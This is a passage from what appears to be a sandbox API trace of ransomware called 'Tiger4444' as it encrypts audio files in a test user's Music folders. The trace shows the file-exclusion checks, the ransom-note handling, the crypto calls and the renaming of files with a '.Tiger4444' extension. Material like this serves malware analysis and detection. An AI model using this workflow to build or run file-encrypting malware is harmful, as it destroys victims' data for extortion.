cFileName="_MAxegZNMc9ssCROLe", cAlternateFileName="_MAXEG~1")) returned 1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2="Tiger4444.exe") returned -1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2=".") returned 1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2="..") returned 1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2="windows") returned -1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2="bootmgr") returned -1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2="pagefile.sys") returned -1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2="boot") returned -1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2="ids.txt") returned -1 [0045.846] lstrcmpiW (lpString1="_MAxegZNMc9ssCROLe", lpString2="NTUSER.DAT") returned -1 [0045.846] lstrcpyW (in: lpString1=0x30aead4, lpString2="_MAxegZNMc9ssCROLe" | out: lpString1="_MAxegZNMc9ssCROLe") returned="_MAxegZNMc9ssCROLe" [0045.846] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0045.846] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x52) returned 0xc60fe8 [0045.846] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc66628 [0045.846] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x220d0070, ftCreationTime.dwHighDateTime=0x1d4c885, ftLastAccessTime.dwLowDateTime=0x9ee9f350, ftLastAccessTime.dwHighDateTime=0x1d4cbd2, ftLastWriteTime.dwLowDateTime=0x9ee9f350, ftLastWriteTime.dwHighDateTime=0x1d4cbd2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_MAxegZNMc9ssCROLe", cAlternateFileName="_MAXEG~1")) returned 0 [0045.846] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0045.847] lstrcpyW (in: lpString1=0x30aead4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.847] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.847] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.847] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.848] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.848] CloseHandle (hObject=0x260) returned 1 [0045.848] CloseHandle (hObject=0x2ac) returned 1 [0045.849] GetCurrentThreadId () returned 0xfa8 [0045.849] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0045.849] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe") returned="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe" [0045.849] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0045.849] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0045.849] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe" | out: lpString1="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe") returned="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe" [0045.849] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\") returned="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\" [0045.849] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\.BFC0E91B00AE8A0620D3" [0045.849] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\_maxegznmc9sscrole\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.852] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.855] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.857] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.857] CloseHandle (hObject=0x2ac) returned 1 [0045.858] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe") returned 40 [0045.858] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.858] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x220d0070, ftCreationTime.dwHighDateTime=0x1d4c885, ftLastAccessTime.dwLowDateTime=0x9ee9f350, ftLastAccessTime.dwHighDateTime=0x1d4cbd2, ftLastWriteTime.dwLowDateTime=0x8058997a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0045.858] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.858] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.858] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.858] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.858] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x220d0070, ftCreationTime.dwHighDateTime=0x1d4c885, ftLastAccessTime.dwLowDateTime=0x9ee9f350, ftLastAccessTime.dwHighDateTime=0x1d4cbd2, ftLastWriteTime.dwLowDateTime=0x8058997a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.858] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.858] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.858] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.858] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.858] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.858] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8058997a, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8058997a, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x805ade51, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.858] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.858] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.858] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36272010, ftCreationTime.dwHighDateTime=0x1d4cc2f, ftLastAccessTime.dwLowDateTime=0x36fde0f0, ftLastAccessTime.dwHighDateTime=0x1d4cc43, ftLastWriteTime.dwLowDateTime=0x36fde0f0, ftLastWriteTime.dwHighDateTime=0x1d4cc43, nFileSizeHigh=0x0, nFileSizeLow=0xda29, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rsJ9UPU.wav", cAlternateFileName="")) returned 1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2="Tiger4444.exe") returned -1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2=".") returned 1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2="..") returned 1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2="windows") returned -1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2="bootmgr") returned 1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2="pagefile.sys") returned 1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2="boot") returned 1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2="ids.txt") returned 1 [0045.858] lstrcmpiW (lpString1="rsJ9UPU.wav", lpString2="NTUSER.DAT") returned 1 [0045.858] lstrcpyW (in: lpString1=0x30aeafa, lpString2="rsJ9UPU.wav" | out: lpString1="rsJ9UPU.wav") returned="rsJ9UPU.wav" [0045.858] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\rsJ9UPU.wav", dwFileAttributes=0x0) returned 1 [0045.859] lstrlenW (lpString="rsJ9UPU.wav") returned 11 [0045.859] lstrlenW (lpString="Tiger4444") returned 9 [0045.859] lstrcmpiW (lpString1="J9UPU.wav", lpString2="Tiger4444") returned -1 [0045.859] lstrlenW (lpString=".dll") returned 4 [0045.859] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0045.859] lstrlenW (lpString=".lnk") returned 4 [0045.859] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0045.859] lstrlenW (lpString=".ini") returned 4 [0045.859] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0045.859] lstrlenW (lpString=".sys") returned 4 [0045.859] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0045.859] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\rsJ9UPU.wav" (normalized: "c:\\users\\fd1hvy\\music\\_maxegznmc9sscrole\\rsj9upu.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.859] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.859] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13731228443) returned 1 [0045.859] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=55849) returned 1 [0045.859] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0045.859] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0045.859] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdd30, lpName=0x0) returned 0x2c8 [0045.859] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdd30) returned 0xbe0000 [0045.861] CryptAcquireContextW (in: phProv=0x30abb40, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30abb40*=0xc71510) returned 1 [0045.861] CryptGenRandom (in: hProv=0xc71510, dwLen=0x80, pbBuffer=0x30abb5c | out: pbBuffer=0x30abb5c) returned 1 [0045.861] CryptReleaseContext (hProv=0xc71510, dwFlags=0x0) returned 1 [0045.861] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.861] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.861] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.861] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.861] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.862] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.862] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.862] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.862] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13731472032) returned 1 [0045.862] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0045.862] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0045.862] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.862] CloseHandle (hObject=0x2c8) returned 1 [0045.862] CloseHandle (hObject=0x260) returned 1 [0045.864] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\rsJ9UPU.wav.Tiger4444") returned 62 [0045.864] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\rsJ9UPU.wav" (normalized: "c:\\users\\fd1hvy\\music\\_maxegznmc9sscrole\\rsj9upu.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\rsJ9UPU.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\_maxegznmc9sscrole\\rsj9upu.wav.tiger4444"), dwFlags=0x1) returned 1 [0045.865] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=55856 | out: Addend=0xc6f980) returned 18834368 [0045.865] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4544 [0045.865] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe6590f0, ftCreationTime.dwHighDateTime=0x1d4ccf8, ftLastAccessTime.dwLowDateTime=0xcbbdfe0, ftLastAccessTime.dwHighDateTime=0x1d4d0ee, ftLastWriteTime.dwLowDateTime=0xcbbdfe0, ftLastWriteTime.dwHighDateTime=0x1d4d0ee, nFileSizeHigh=0x0, nFileSizeLow=0x281b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wXxWLXtHA6IWwzbkTvK.m4a", cAlternateFileName="WXXWLX~1.M4A")) returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2="Tiger4444.exe") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2=".") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2="..") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2="windows") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2="bootmgr") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2="pagefile.sys") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2="boot") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2="ids.txt") returned 1 [0045.865] lstrcmpiW (lpString1="wXxWLXtHA6IWwzbkTvK.m4a", lpString2="NTUSER.DAT") returned 1 [0045.865] lstrcpyW (in: lpString1=0x30aeafa, lpString2="wXxWLXtHA6IWwzbkTvK.m4a" | out: lpString1="wXxWLXtHA6IWwzbkTvK.m4a") returned="wXxWLXtHA6IWwzbkTvK.m4a" [0045.865] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\wXxWLXtHA6IWwzbkTvK.m4a", dwFileAttributes=0x0) returned 1 [0045.865] lstrlenW (lpString="wXxWLXtHA6IWwzbkTvK.m4a") returned 23 [0045.865] lstrlenW (lpString="Tiger4444") returned 9 [0045.865] lstrcmpiW (lpString1="bkTvK.m4a", lpString2="Tiger4444") returned -1 [0045.865] lstrlenW (lpString=".dll") returned 4 [0045.865] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0045.865] lstrlenW (lpString=".lnk") returned 4 [0045.865] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0045.865] lstrlenW (lpString=".ini") returned 4 [0045.866] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0045.866] lstrlenW (lpString=".sys") returned 4 [0045.866] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0045.866] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\wXxWLXtHA6IWwzbkTvK.m4a" (normalized: "c:\\users\\fd1hvy\\music\\_maxegznmc9sscrole\\wxxwlxtha6iwwzbktvk.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.866] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.866] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13731884753) returned 1 [0045.866] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=10267) returned 1 [0045.866] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0045.866] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0045.866] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2b20, lpName=0x0) returned 0x2c8 [0045.866] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2b20) returned 0xbe0000 [0045.866] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.867] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.867] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.867] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.867] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.867] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.867] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.867] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.867] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13732003974) returned 1 [0045.867] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0045.867] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0045.867] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.867] CloseHandle (hObject=0x2c8) returned 1 [0045.867] CloseHandle (hObject=0x260) returned 1 [0045.868] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\wXxWLXtHA6IWwzbkTvK.m4a.Tiger4444") returned 74 [0045.869] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\wXxWLXtHA6IWwzbkTvK.m4a" (normalized: "c:\\users\\fd1hvy\\music\\_maxegznmc9sscrole\\wxxwlxtha6iwwzbktvk.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\wXxWLXtHA6IWwzbkTvK.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\_maxegznmc9sscrole\\wxxwlxtha6iwwzbktvk.m4a.tiger4444"), dwFlags=0x1) returned 1 [0045.869] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=10272 | out: Addend=0xc6f980) returned 18890224 [0045.869] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4546 [0045.869] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe6590f0, ftCreationTime.dwHighDateTime=0x1d4ccf8, ftLastAccessTime.dwLowDateTime=0xcbbdfe0, ftLastAccessTime.dwHighDateTime=0x1d4d0ee, ftLastWriteTime.dwLowDateTime=0xcbbdfe0, ftLastWriteTime.dwHighDateTime=0x1d4d0ee, nFileSizeHigh=0x0, nFileSizeLow=0x281b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wXxWLXtHA6IWwzbkTvK.m4a", cAlternateFileName="WXXWLX~1.M4A")) returned 0 [0045.869] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0045.869] lstrcpyW (in: lpString1=0x30aeafa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.869] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\_MAxegZNMc9ssCROLe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\_maxegznmc9sscrole\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.869] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.870] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.871] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.871] CloseHandle (hObject=0x260) returned 1 [0045.871] CloseHandle (hObject=0x2ac) returned 1 [0045.872] GetCurrentThreadId () returned 0xfa8 [0045.872] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66628 [0045.872] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music\\yxGMwmgC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC") returned="C:\\Users\\FD1HVy\\Music\\yxGMwmgC" [0045.872] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc823d0 | out: hHeap=0xc50000) returned 1 [0045.872] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66620 | out: hHeap=0xc50000) returned 1 [0045.872] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\yxGMwmgC" | out: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC") returned="C:\\Users\\FD1HVy\\Music\\yxGMwmgC" [0045.872] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\") returned="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\" [0045.872] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\.BFC0E91B00AE8A0620D3" [0045.872] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.873] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.875] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.876] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.877] CloseHandle (hObject=0x2ac) returned 1 [0045.877] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\yxGMwmgC") returned 30 [0045.877] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.877] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4d50b90, ftCreationTime.dwHighDateTime=0x1d4cd42, ftLastAccessTime.dwLowDateTime=0xf95e6880, ftLastAccessTime.dwHighDateTime=0x1d4ca2d, ftLastWriteTime.dwLowDateTime=0x805d51f3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 